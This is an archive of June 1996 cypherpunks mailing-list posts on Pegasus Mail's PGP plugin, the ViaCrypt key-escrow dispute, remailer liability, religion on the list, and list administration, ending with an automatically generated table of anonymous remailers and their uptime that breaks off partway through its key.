hIwDSReYoIbc3PkBA/9xblBrrofx89t5QoJVwCyGB/+futdCXEolwcsQdwWGcDtc
7Vn7orCB8v6iQO+sCgAlYf38ftUxGmzebDd/7eWodTGx8XKnzBIZ9E6bRS38XLRa
XDaipoiNRDi7gX2DA5ADtshTLtUiCjaYurGxGEla2iIMrEacGEyyekdZpUYT1KYA
AAJ17fM4D2X8vpKTtWLr/6REeQvxPU80FpWKa/q1b6wMZ43oG9ZolMONj65hWqX0
mhY+wp/vUsvQ21P/9VzYF0sy9JIAr45VhoDZBBCG0UW23WoOInXko2Kl2UeZmrut
xR/nZm1sMzU+XYr7QG17aOfeezRs/frYEpvuAbrWYNELlPH72OBJ368nSkesiTo+
gELda7vNsD12UTEl7gRAo3WizCY2zsQySLOShEiAX7f5vYco8A6pEwJ4XYs4pGn6
xV4JNUeMjBKGtVkGoZJln3x7W1brgGmRNQbY/dcmCkExOOp+4myRVu0/ufH7n5TO
FWqrb+nqyjgnirqS9DwoqB5JsHiMWU/dJBaCtXH4i1p//oeE9FE82nE2vAOZGMvn
D+MRnheCVRi2TWnwe44PnB+L5z7+J+YJyulGM3bvXhZukjGCAj+EMmWxqkSgc2NS
/xh6efgZNACmQIqxLdsw6TLbh9p+yMaxtaCZU9Bs9jw8dN+7FBZxgFG/hrrI1uh3
oFahFMDXXAUMUs7lFOcxjAWTRRZKKSOG2mg5M5mr8VbY+5BQdcJJeY+jSCnDinUC
wGFfEWlZMV7sdKhzA0YkHJYBgAPtmTaxrHQidPce46FbIeYVRsUOSEtvttYpMjIz
mCVc5ywueUXbUe5UW3KrlV8uxKH3fEIEZ9Pxf3M9XR/aFXysccnzNzbe87XN8PDk
mxzsRzmoD0CgCSAGfNrTdWl8bFQGnEaweMPnSIFzbSJkRcO0oiBU4/dhEFYiPgx5
UD2r0uFNjKPt4KFBbFJLi0mrMuOCaxjhva7i70GQ95b4qVsyOZLN5KYSUnSDxDX4
HFUIrEI/rsw=
=BesD
-----END PGP MESSAGE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <llurch@networking.stanford.edu>
Date: Mon, 17 Jun 1996 14:41:02 +0800
To: Rich Burroughs <richieb@teleport.com>
Subject: Re: Snake Oil on the Water...
In-Reply-To: <2.2.32.19960616192749.008f7570@mail.teleport.com>
Message-ID: <Pine.GUL.3.93.960616185913.7965A-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 16 Jun 1996, Rich Burroughs wrote:

[...]
> Here's the reply I sent to that list.  I cc'd the person who sent the
> original message...
[...]
[referring to http://www.aimnet.com/~jnavas/winpmail.html]
> I really think the Pegasus team would do better to mention
> that John's program is available, rather than try to steer
> people away from PGP.  PGP JN makes using the basic email

AFAIK, "The Pegasus Team" is still one person, and he's not an idiot. The
person who sent the message was some random idiot, not a member of "The
Pegasus Team." Just thought that should be straightened out lest any
unwarranted ill will be left floating around... 

-rich





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Burroughs <richieb@teleport.com>
Date: Mon, 17 Jun 1996 16:09:58 +0800
To: cypherpunks@toad.com
Subject: Re: Snake Oil on the Water...
Message-ID: <2.2.32.19960617033306.00921104@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:03 PM 6/16/96 -0700, Rich Graves wrote:
>On Sun, 16 Jun 1996, Rich Burroughs wrote:
>
>AFAIK, "The Pegasus Team" is still one person, and he's not an idiot. The
>person who sent the message was some random idiot, not a member of "The
>Pegasus Team." Just thought that should be straightened out lest any
>unwarranted ill will be left floating around... 

Yes, you're absolutely right, and I owe the Pegasus author a big
apology for assuming that this guy who thinks there's a 40 bit
domestic version of PGP had anything to do with Pegasus.

I really misspoke, and I apologize.

BTW, I've heard that Pmail is progressing quite well.


Rich

______________________________________________________________________
Rich Burroughs  richieb@teleport.com  http://www.teleport.com/~richieb
See my Blue Ribbon Page at http://www.teleport.com/~richieb/blueribbon
U.S. State Censorship Page at - http://www.teleport.com/~richieb/state
New EF zine "cause for alarm" - http://www.teleport.com/~richieb/cause





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Lou Zirko <lzirko@c2.org>
Date: Mon, 17 Jun 1996 16:20:52 +0800
To: cypherpunks@toad.com
Subject: Re: Snake Oil on the Water...
Message-ID: <199606170337.UAA03575@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

To: richieb@teleport.com, cypherpunks@toad.com, alano@teleport.com
Date: Sun Jun 16 22:36:53 1996
Now if we could get John to get it to work with the 32-bit version it would 
be even better.

Lou Z.

> John's program is available at:
> http://www.aimnet.com/~jnavas/winpmail.html
> 
> I really think the Pegasus team would do better to mention
> that John's program is available, rather than try to steer
> people away from PGP.  PGP JN makes using the basic email
> features of PGP more streamlined than most other mail
> packages I've used (except Private Idaho, which is not a
> full-fledged email package).  I think it would be better to
> mention that both options exist, rather than seeking to
> convert the masses away from PGP, which is unlikely to
> succeed anyway, IMHO.

Lou Zirko                                (502)383-2175
Zystems                                  lzirko@c2.org
"We're all bozos on this bus" - Nick Danger, Third Eye

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3i
Charset: latin1

iQEVAwUBMcTTBstPRTNbb5z9AQEWpAgAoNBF5M+xyRPRAQjdBR8NpMgwEsb2lROj
Now8Ku1ovNvTDc+Y7ZJ8InN1pyM53SA72LIjXFX5Tjughbkkh+96nXCsdEvStBO2
im4rIA+cv2QmcdhGVScgokUkY5BRiNnCc92bH+zOxmQMx/r7Bx8779phChQebF6P
01GP94Vlwh8lVoM7T4LCfAto5tsgMQVIwbOoYqkeDU1SpSQvz030XpQqaN94oCTh
le7foWIWMJuAD26zetsbWgeEfZpIL/9M4e1dfDbcSJsBBN3Wwzs2XxKYqgbsz7ob
18+4toNNblt6WcPnhvbFzSgf3v0sYUAEcqawg/7QJiCBjNGncBwjJw==
=nVgx
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien Lucifer <root@HellSpawn>
Date: Mon, 17 Jun 1996 12:52:22 +0800
To: cypherpunks@toad.com
Subject: The Molson Great Web Anonymizer
Message-ID: <Pine.LNX.3.91.960616203924.4401A-100000@HellSpawn>
MIME-Version: 1.0
Content-Type: text/plain



Actually, they call it the Molson Web Canadianizer, but it looks like an 
anonymizer to me.  You give it a URL and the Canadianizer grabs the URL 
and adds some funny canadian modifications to the page, and sends it back 
to you.  It changes all the links to link through the canadianizer, also, 
which is convenient. 

This page originally allowed you to specify a url, but now it seems they 
only allow you to click and grab a random page. Specifying the address to 
connect to in your browser will solve this though.. Heres the URL:


http://www.molson.com/cgi-bin/cize?url=http://www.your.site.com/the/url






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Date: Mon, 17 Jun 1996 14:38:37 +0800
To: Alan Olsen <alano@teleport.com>
Subject: Re: Snake Oil on the Water...
Message-ID: <199606170049.UAA14796@unix.asb.com>
MIME-Version: 1.0
Content-Type: text/plain


On 16 Jun 96 at 11:19, Alan Olsen wrote:

> I recieved this on another list.  The snake oil is starting to flow pretty
> heavy.  I expect it to get worse...

> >Subject: Windows 3.x or Win95 FREEWARE Mail/Encryption Program
> >X-UIDL: 788ef8d7083cb4f8e94b2c20183773b5
[..]
> >At the following two sites, you may download the FREEWARE Pegasus Mail
> >program version 2.3.3 16 bit for windows 3.x or a version for WIN95. The
> >unique thing about it, besides its simplicity and that it's a great mail
> >program better than Eudora, it has a built in encryption program that is as

Actually, it is much better than Eudora and has plug-ins for 
encryption.  The native encryption sucks, and the author warns 
against it (it's there as a demo of the crypto API!).

There *is* a PGP-plugin (w/source) that uses PGP to 
encrypt or decrypt mail and add keys.  The last version I saw had 
shitty key management... if you're emailing somebody at an address 
different from the key-id, it didn't prompt you for another key (and 
Pegasus 2.2 sent it out in cleartext!).

I don't like the add on much, but many others do, aware of that flaw 
and some others.

Seems like the person who wrote that message doesn't know what he's 
talking about.

There's a difference between snake oil and a user who doesn't 
understand a product.

Rob.
 
---
No-frills sig.
Befriend my mail filter by sending a message with the subject "send help"
Key-ID: 5D3F2E99 1996/04/22 wlkngowl@unix.asb.com (root@magneto)
        AB1F4831 1993/05/10 Deranged Mutant <wlkngowl@unix.asb.com>
Send a message with the subject "send pgp-key" for a copy of my key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: AwakenToMe@aol.com
Date: Mon, 17 Jun 1996 13:38:00 +0800
To: sophi@best.com
Subject: Java
Message-ID: <960616205402_557578073@emout14.mail.aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Since I am new here, and its probably been asked one billion times...
.. I've only heard a tiny bit about a problem that existed with security and
Java about 6 months ago.... What was it?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Damien Lucifer <root@HellSpawn>
Date: Mon, 17 Jun 1996 15:26:17 +0800
To: cypherpunks@toad.com
Subject: [noise] Re: SM3 ?'s (fwd)
Message-ID: <Pine.LNX.3.91.960616205842.4422A-100000@HellSpawn>
MIME-Version: 1.0
Content-Type: text/plain




On Sun, 16 Jun 1996 19:09:45 -0400, eron@in-sync.com (Eron Cohen)
wrote:

Don C. Jenkins wrote:

> 3) Now that I am almost convinced that SM3 is the software I wish to
> purchase - I was wondering if there is a way to make it automaticley edit
> out irritating clients from my schedule? Or insert an extra million in my
> bank account?
>

Yes.  We are planning to ship this effect with 3.5 version of Razor
next month. Not only does it remove the clients from your schedule but 
from your entire life using an advanced form of pattern recognition.  We 
need to get this approved by the bureau of tobacco and firearms before we 
are allowed to start shipping it though, because in some places its 
considered a munition.  Once approved we  hope we can open our market to 
annoyed people in other fields too.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 17 Jun 1996 16:43:36 +0800
To: cypherpunks@toad.com
Subject: Re: Snake Oil on the Water...
Message-ID: <2.2.32.19960617043137.00d111a0@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:27 PM 6/16/96 -0700, Rich Burroughs wrote:

>For those people who want to use PGP with Pegasus, there's a
>nice little plug-in for Pegasus called PGP JN, by John Navas,
>which allows you to choose to encrypt with PGP (you need to
>have a copy) instead of the Pmail crypto.  It has a few small
>drawbacks, IMHO, but I found it much easier to use than PGP
>shell interfaces that require cutting text to the clipboard 
>first.

It is very nice with one major drawback.  It does not support conventional
cryptography with PGP.  This means that it is absolutly useless for use with
nyms.  (Which is one of my main uses for PGP in the first place.)  Other
than that...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Mon, 17 Jun 1996 16:44:55 +0800
To: "Deranged Mutant" <WlkngOwl@unix.asb.com>
Subject: Re: Snake Oil on the Water...
Message-ID: <2.2.32.19960617043139.00d52ba8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 08:47 PM 6/16/96 +0000, Deranged Mutant wrote:

>Actually, it is much better than Eudora and has plug-ins for 
>encryption.  The native encryption sucks, and the author warns 
>against it (it's there as a demo of the crypto API!).

I found this part out later.  My mistake for not checking the program docs.

[snip]

>Seems like the person who wrote that message doesn't know what he's 
>talking about.

That is very true.  He is clueless and unrepentantly so.  His private e-mail
to me indicates it in spades.  (As well as being rude and insulting for even
challenging his claims about the program.)

>There's a difference between snake oil and a user who doesn't 
>understand a product.

True.  I was not aware that the author of the program had warned against
using it as well.  Evidently this guy did not read that part as well...

---
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Mon, 17 Jun 1996 14:08:04 +0800
To: cypherpunks@toad.com
Subject: Re: whitehouse queries files on political enemies
In-Reply-To: <199606102021.NAA01025@netcom9.netcom.com>
Message-ID: <Pine.3.89.9606162123.B14926-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Mon, 10 Jun 1996, Vladimir Z. Nuri wrote:

> 
> what goes around comes around..
> this reminds me of the old stories of Nixon and the various NSA
> domestic programs mentioned by Bamford ("Puzzle Palace")

Speaking of which, is the second edition actually out yet?




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul S. Penrod" <furballs@netcom.com>
Date: Mon, 17 Jun 1996 17:46:02 +0800
To: cypherpunks@toad.com
Subject: Re: Slander of Catholic Church
In-Reply-To: <ade31529110210043f6a@[205.199.118.202]>
Message-ID: <Pine.3.89.9606162154.A9589-0100000@netcom19>
MIME-Version: 1.0
Content-Type: text/plain




On Tue, 11 Jun 1996, Timothy C. May wrote:

> At 5:59 PM 6/11/96, attila wrote:
> 
> >        too strong, moroni  --remember _our_ values; not those of a critic.
> >    last night in FHE I covered the first mob in Jackson County where Bushop
> >    Partridge turned the other cheek to make it easier after the first was
> >    tarred by the mob.
> 
> Thanks, Attila. I think Paul Penrod and the Archangel Moroni missed my main
> point. I was not singling out Mormonism for special criticism, just using
> it as an example of a "cult" or "religion" which is in many ways even more
> "outre" to many of us than Scientology is. Belief that a body rotting in
> the ground can be baptized into one's church is at least as odd as
> believing that Mankind is descended from the survivors of spaceships
> fleeing an evil overlord.

No, Tim, I got your point. What I object to is the use of the list to 
express yet another tangental non-topical thread when we already have the 
"hallowed" Dr. Hallam-Baker pontificating on the virtues and 
existentialism of the marketplace at what I suppose he presumes is at the 
expense of Perry Metzger, the assasination politics bullshit, and various 
other noise producing posts.

What you may not realize is, while the CoS may be interested in 
protecting their reputation, I have not seen spam in this list as the 
result of any critism; however, anti-mormonism runs long and deep, and 
there will be a deluge of postings here should some entrprising 
individual take it upon himself to post the topic elsewhere (which I have 
seen samples of post from this list appear in other usenet groups.)

What I don't want to see is this list get any muddier. 4 Days out of 
pocket and I have 345 messages, most of which gets round filed.

> 
> My point, in using Catholicism as an example (interesting that only my
> brief lines on Mormon views were critiqued...Catholicism must indeed be
> nearly extinct on lists like ours), was that one's man's "criminal cult" is
> another man's "holy religion," and that the "net.war" declared by some on
> the Church of Scientology is little different than having a similar war
> against Catholics, Rosicrucians, Parsees, whatever.

I don't comment on the Catholics as I don't know enough about them to 
render an informed opinion.

As to the free speech and exercising of religion issues, I find that more 
relavent and worthy of the writings that hallmark your thoughtfulness on 
any topic.

> 
> The Church of Scientology is no more a cult than is LDS or
> Catholicism....it is just much newer. Believing that clam consciousness
> suffuses our thoughts is no stranger than are the bizarre claims of most
> religions.
> 
> Talk is of some belief systems being "cults" and others being "religions."
> When the Constitution speaks of "Congress shall make no law regarding the
> establishment of religion...," it is clear that this is not just for
> "recognized" and "established" religions.
> 
> (Before the usual suspects jump in with quibbles, this does not mean that a
> religion may not be constrained in various ways. The laws against polygamy
> constrained the Mormons, the laws against certain drugs constrained certain
> Native American religions, etc. Constitutional law classes are the best
> forum to debate this.)
> 
> I am no supporter of the CoS, nor of any religion. I find it hypocritical
> for folks bashing the "clams" and bombarding a.r.s with copyrighted CoS
> material to now be whining that the clams are "unfairly" using a.r.s.
> 
> I also find it "unsurprising" that the CoS is taking steps to preserve what
> it thinks is its copyrighted, proprietary material.
> 
> (I am  not interested in debating the ins and outs of whether the NOTS
> material should or should not have been published, nor of whether some
> investigators went overboard in investigations of Grady Ward, etc. This
> stuff is boring ephemera to me, just another religious war.)
> 
> --Tim May
> 






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 17 Jun 1996 17:03:10 +0800
To: Scott Schryvers <schryver@radiks.net>
Subject: How to find out if the list is down? [ADMINISTRIVIA]
Message-ID: <199606170519.WAA12239@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>Subject: Is the list down?

No (and the delay between your posting and my reply
is just because I've been too busy to read it all.)
In general, if the list isn't reaching you, it's occasionally because
mail is stuck between toad.com and your machine, occasionally because
the list is stuck, and occasionally because you've been dropped.

If you send mail to majordomo@toad.com saying
        who cypherpunks
it will send you a list of everyone on the list, possibly including you.
(If it doesn't include you, then you know what's wrong.)
If mail's working, it usually answers pretty fast.  
If mail's jammed, sometimes this kicks it off, and sometimes it stalls,
just like a posting you sent to the entire 1200+ list members would (:-).

And sometimes there's something more subtle going on, in which case you
can send mail to cypherpunks-owner@toad.com and/or owner-cypherpunks@toad.com.

Of course, it could be that nobody's posted anything to the list
in the last 24 hours, which probably means that Hugh's implemented
the Signal-to-Noise-Improver Bot and nothing made it past the filters.....

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 17 Jun 1996 18:34:27 +0800
To: "Declan B. McCullagh" <declan+@CMU.EDU>
Subject: Re: Remailer Operator Liability? [NOISY RESPONSE]
Message-ID: <199606170649.XAA13162@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>> distributed to a minor who was using a nym. I think pressure on anonymous
>> remailers is going to increase as various groups complain that the paw
>> innocent widdle kiddies are "vulnerable to corruption"(or some bullshit like
>> that) because their age can be hidden. Read the decision. The CDA _may_ be
>
>This is true. Yesterday evening I interviewed the director of
>enforcement for a TLA here in DC. He expressed his concern about
>anonymous remailers and anonymity online. (More on this later.)
>
>The word here in DC is "accountability."

You can always attract government officials by offerering them
other bureauspeakisms, like "plausible deniability" and
"convenient leak mechanisms for 'reputable sources'".

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <stewarts@ix.netcom.com>
Date: Mon, 17 Jun 1996 19:27:25 +0800
To: "Joseph M. Reagle Jr." <reagle@MIT.EDU>
Subject: Re: Does information want to be free?
Message-ID: <199606170744.AAA13912@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


>>I confess I was amused by how he described those Internet anarchists
>> who delighted in publicizing books that should in fact be restricted.
>        I am amused (though I am not taking sides) by the general lack of
>attention or rhetoric that "crypto-anarchists"/"cypherpunks"/whatever,
>otherwise privacy respecting people, usually espouse.

Many of us do care about those privacy issues - computers are very good
at combining information from multiple sources, and crypto is about the
only technology that lets you change the balance of power away from
computerized centralization to individual-controlled decentralization.

On the other hand, the phrase "books that should in fact be restricted"
is viewed by many of us to be a synonym for "the empty set"; "books about
government leaders which should be restricted" is an even emptier set,
whether they're true, bogus, or some of each.

In general, a Cypherpunk(tm) approach to protecting private information
is not to advocate laws against distributing it, but to build tools to 
let you protect it while giving it to people that you _do_ want to have it;
perhaps to use individual contracts to protect the information,
but also to build tools to support contractual agreements and
identify leaks.  In some cases, boycotting organizations that violate
privacy is a good idea (and building alternatives can support boycotts);
flaming them for rudeness is another approach :-), and helping organizations
understand the privacy implications of what they're doing and helping
them use privacy-preserving methods instead of hanging an SSN on everything
is another good cypherpunks activity.  On the other hand, building
anonymous publishing systems so people can blow the whistle on their
government officials is a good thing, even though it may be used by
people rude enough to pry into people's private lives.

Also, while publishing one politician's cancer experience may be rude,
publishing a recent American president's growing senility should have
been done more aggressively, as should publishing the moral failures
of his Vice president....

#				Thanks;  Bill
# Bill Stewart +1-415-442-2215 stewarts@ix.netcom.com
# http://www.idiom.com/~wcs
#				Dispel Authority!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: vin@shore.net (Vin McLellan)
Date: Mon, 17 Jun 1996 18:07:11 +0800
To: Edgar Swank <edgar@Garg.Campbell.CA.US>
Subject: Re: Zimmerman/ViaCrypt?
Message-ID: <v02140b01adea690a261a@[198.115.179.224]>
MIME-Version: 1.0
Content-Type: text/plain


Edgar Swank noted:

>There was a big discussion recently on alt.security.pgp about PRZ and
>ViaCrypt.  Apparently Phil now wants to produce his own commercial
>version of PGP and has "requested" ViaCrypt to sell back the
>commercial rights under threat of a lawsuit if they don't.
>
>Phil disagrees with ViaCrypts new "business" version of PGP which
>apparently encrypts all messages with an employer-supplied public key
>in addition to any specified by the employee.  ViaCrypt has their side
>of the argument on their web page. <http://www.viacrypt.com/>

        PRZ is becoming a businessman.  Nothing wrong about that --
business is what makes the cars shine and the toilets flush.  To me,
however, it seems self-servingly pious to seek to reclaim previously sold
rights on the grounds that a corporate customer should not have the right
to set up an escrow key for company communications.

        There's another debate due about whether an employee should have
the right to also -- on company time, over company nets, etc. -- use e-mail
with a private (non-escrowed) encryption to secure personnal
communications.  I, predicably, think the employee should have such a right
-- as part of the permissible and acceptable "personal space" allowed an
employee.  (Just as he/she should be allowed to make unmonitored personal
phone calls, and go to the bathroom when the urge strikes.)  Today, this
level of privilege is probably an artifact of white collar or professional
employment;  not an employee's or citizen's right, but rather a perk
associated with the independence granted a valued employee who expects and
demands it.

>The basis of the possible lawsuit would be that ViaCrypt violated
>their agreement not to put any "back door" into any product with the
>PGP name. Whether the "business version feature" could be defined as a
>"back door" would be the crux of the argument.

        That's an argument that should be laughed out of court.  And off
the Net even sooner.  (Although Phil is so much of a hero to most of us,
for his own productive efforts and for having endured the DoJ's squeeze, he
probably got an outrageously tolerant hearing on alt.security.pgp.)

 Steve Reid <root@edmweb.com> added:

>>IMHO Phil Zimmerman has good reason to object to the mutant version, >>if
>>it's going to cause the PGP name to somehow endorse escrow.

        Balderdash! There is nothing corrupt or nasty about escrow, per se
-- the issue is who gets access to the escow key and under what conditions.
If the legitimate owner of the protected information totally controls the
escrow key, there is no issue.  In business communications, key escow is
just another dimension in backup.

>>If there really is a demand for escrow, maybe cypherpunks could create a
>>One Time Pad escrow service. Different custom 'keys' could be produced,
>>depending on who's asking for the data... <G>

        There is a demand for escrow.  For a while, seven or eight years
ago, I collected tales of all the weak commercial crypto system which were
then being busted.  One of the most striking things was the number -- four
or five commercial products that I recall, Lotus 1,2,3 being the most
prominent -- which were cracked by legitimate administrators desperate to
retrieve something encypted by an employee who had lost his/her key.

        Suerte,
                                _Vin

         Vin McLellan +The Privacy Guild+ <vin@shore.net>
      53 Nichols St., Chelsea, Ma. 02150 USA Tel: (617) 884-5548
                         <*><*><*><*><*><*><*><*><*>






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 17 Jun 1996 21:48:09 +0800
To: cypherpunks@toad.com
Subject: Re: Remailer Operator Liability?
Message-ID: <2.2.32.19960617102038.00b7949c@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:53 PM 6/15/96 +1000, Zed wrote:
>
>Unlikely. The use of anonymous remailers was given as a reason for why it
>was impossible to effectively determine if indecent material was being
>distributed to a minor who was using a nym. I think pressure on anonymous
>remailers is going to increase as various groups complain that the paw
>innocent widdle kiddies are "vulnerable to corruption"(or some bullshit like
>that) because their age can be hidden. Read the decision. The CDA _may_ be
>declared constitutional if there was an effective and reliable way of
>preventing minors from accessing "indecent" material - which anonymous
>remailers make harder to do.

However, even if remailers didn't exist, kiddies could still be unknowingly
reached via mailing lists (anyone know who came up with the term "email
exploder" that the Court used instead of "mailing list"?), freenet accounts,
un- age verified accounts opened anywhere on earth, or borrowed accounts.
The decision mentioned some of this.

DCF





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Mon, 17 Jun 1996 22:04:46 +0800
To: cypherpunks@toad.com
Subject: Re: Remailer Operator Liability?
Message-ID: <2.2.32.19960617102043.00b73358@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 05:53 PM 6/15/96 +1000, Zed wrote:
>On another front, anonymous remailers were brought up in the latest hearing
>of the Church of Scientology's court case against Dennis Erlich. Judge Whyte
>expressed concern that trade secret status could be destroyed simply by
>posting information through an anonymous remailer. 

Of course, trade secret status could also be destroyed by posting something
straight without anonymity.  And were one judgment proof one's exposure as
the poster would be meaningless.  Even a completely non-anonymous account
may be hard to trace if you have a common name and the account is based
somewhere far from home.  If you open an account on a Dutch system using
your (common) name, you might be hard to find.

It's the ease of publication not the anonymity that makes the Net dangerous
for trade secrets.

DCF

"If the most common given name on earth is Mohammed and the most common
surname is Lee does that mean that the most common name is Mohammed Lee?"





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@CS.Berkeley.EDU>
Date: Tue, 18 Jun 1996 04:52:39 +0800
To: cypherpunks@toad.com
Subject: List of reliable remailers
Message-ID: <199606171350.GAA22019@kiwi.cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


   I operate a remailer pinging service which collects detailed
information about remailer features and reliability.

   To use it, just finger remailer-list@kiwi.cs.berkeley.edu

   There is also a Web version of the same information, plus lots of
interesting links to remailer-related resources, at:
http://www.cs.berkeley.edu/~raph/remailer-list.html

   This information is used by premail, a remailer chaining and PGP
encrypting client for outgoing mail. For more information, see:
http://www.c2.org/~raph/premail.html

   For the PGP public keys of the remailers, finger
pgpkeys@kiwi.cs.berkeley.edu

This is the current info:

                                 REMAILER LIST

   This is an automatically generated listing of remailers. The first
   part of the listing shows the remailers along with configuration
   options and special features for each of the remailers. The second
   part shows the 12-day history, and average latency and uptime for each
   remailer. You can also get this list by fingering
   remailer-list@kiwi.cs.berkeley.edu.

$remailer{"extropia"} = "<remail@miron.vip.best.com> cpunk pgp special";
$remailer{"portal"} = "<hfinney@shell.portal.com> cpunk pgp hash";
$remailer{"alumni"} = "<hal@alumni.caltech.edu> cpunk pgp hash";
$remailer{"c2"} = "<remail@c2.org> eric pgp hash reord";
$remailer{"penet"} = "<anon@anon.penet.fi> penet post";
$remailer{"flame"} = "<remailer@flame.alias.net> cpunk mix pgp. hash latent cut post reord";
$remailer{"mix"} = "<mixmaster@remail.obscura.com> cpunk mix pgp hash latent cut ek ksub reord ?";
$remailer{"replay"} = "<remailer@replay.com> cpunk mix pgp hash latent cut post ek";
$remailer{"ecafe"} = "<cpunk@remail.ecafe.org> cpunk mix";
$remailer{"amnesia"} = "<amnesia@chardos.connix.com> cpunk mix pgp hash latent cut ksub";
$remailer{'alpha'} = '<alias@alpha.c2.org> alpha pgp';
$remailer{'nymrod'} = '<nymrod@nym.jpunix.com> alpha pgp';
$remailer{"lead"} = "<mix@zifi.genetics.utah.edu> cpunk pgp hash latent cut ek";
$remailer{"treehole"} = "<remailer@mockingbird.alias.net> cpunk pgp hash latent cut ek";
$remailer{"exon"} = "<remailer@remailer.nl.com> cpunk pgp hash latent cut ek";
$remailer{"vegas"} = "<remailer@vegas.gateway.com> cpunk pgp hash latent cut";
$remailer{"haystack"} = "<haystack@holy.cow.net> cpunk mix pgp hash latent cut ek";
$remailer{"ncognito"} = "<ncognito@rigel.cyberpass.net> mix cpunk pgp hash latent";
catalyst@netcom.com is _not_ a remailer.
lmccarth@ducie.cs.umass.edu is _not_ a remailer.
usura@replay.com is _not_ a remailer.

Groups of remailers sharing a machine or operator:
(c2 alpha)
(flame replay)
(alumni portal)

Use "premail -getkeys pgpkeys@kiwi.cs.berkeley.edu" to get PGP keys
for the remailers. Fingering this address works too.

Note: The remailer list now includes information for the alpha
nymserver.

Last update: Mon 17 Jun 96 6:46:17 PDT
remailer  email address                        history  latency  uptime
-----------------------------------------------------------------------
replay   remailer@replay.com              ****+*+***+*     6:14  99.98%
alumni   hal@alumni.caltech.edu           #######**#+#     2:57  99.97%
ecafe    cpunk@remail.ecafe.org           *##.-#+--#+#    50:08  99.96%
vegas    remailer@vegas.gateway.com       -** **+*#*+#     6:21  99.90%
mix      mixmaster@remail.obscura.com     .-+++++++-+   3:15:05  99.90%
c2       remail@c2.org                    -++-++++-++   1:07:45  99.89%
flame    remailer@flame.alias.net         +++++++++++   1:05:51  99.76%
penet    anon@anon.penet.fi               _______._    60:16:03  99.64%
portal   hfinney@shell.portal.com         ##*###  ##+#     2:46  99.49%
nymrod   nymrod@nym.jpunix.com             +**#++*+* *     9:43  99.45%
lead     mix@zifi.genetics.utah.edu       +-++++++++++    45:49  99.29%
exon     remailer@remailer.nl.com         *** *++***+*     5:07  99.23%
haystack haystack@holy.cow.net            *#* +--#*-*+    23:51  99.18%
amnesia  amnesia@chardos.connix.com       ------- ---   3:19:01  96.26%
extropia remail@miron.vip.best.com        ---.-- ----   6:23:54  94.00%
ncognito ncognito@rigel.cyberpass.net      -....- ..   14:29:58  89.44%
treehole remailer@mockingbird.alias.net   +-++++++      3:28:59  62.60%
alpha    alias@alpha.c2.org               ++***+-         37:51  49.39%

   History key
     * # response in less than 5 minutes.
     * * response in less than 1 hour.
     * + response in less than 4 hours.
     * - response in less than 24 hours.
     * . response in more than 1 day.
     * _ response came back too late (more than 2 days).

   cpunk
          A major class of remailers. Supports Request-Remailing-To:
          field.
          
   eric
          A variant of the cpunk style. Uses Anon-Send-To: instead.
          
   penet
          The third class of remailers (at least for right now). Uses
          X-Anon-To: in the header.
          
   pgp
          Remailer supports encryption with PGP. A period after the
          keyword means that the short name, rather than the full email
          address, should be used as the encryption key ID.
          
   hash
          Supports ## pasting, so anything can be put into the headers of
          outgoing messages.
          
   ksub
          Remailer always kills subject header, even in non-pgp mode.
          
   nsub
